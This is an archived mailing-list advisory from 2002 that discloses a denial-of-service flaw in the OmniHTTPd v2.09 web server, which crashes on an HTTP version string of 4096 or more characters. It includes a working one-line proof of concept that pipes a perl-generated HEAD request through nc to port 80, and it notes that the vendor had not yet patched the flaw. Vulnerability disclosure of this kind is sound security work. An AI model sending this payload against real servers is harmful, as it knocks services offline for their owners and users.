|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Martin J. Muench (mjm
codito.de)Date: Mon Jul 01 2002 - 13:27:18 CDT
Hi there.
The OmniHTTPd v2.09 of Omnicron (www.omnicron.ca) contains
a problem with handling long HTTP versions which causes a denial of
service.
Found this problem while developing a new plugin for BED (Bruteforce
Exploit Detector,www.kryptocrew.de/snakebyte/bed.html).
[ Problem
When sending a malformed request with a HTTP version containing 4096 or
more characters, the HTTPd crashes.
Example:
perl -e 'print "HEAD / "."a"x4096 ."\n\n"' | nc 127.0.0.1 80
This attack also works with every other request types like 'GET', 'POST',... .
[ Patches
Nothing published yet, contacted vendor 2 weeks ago.
Keep looking at vendor site at www.omnicron.ca.
Martin J. Muench
- www.codito.de
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]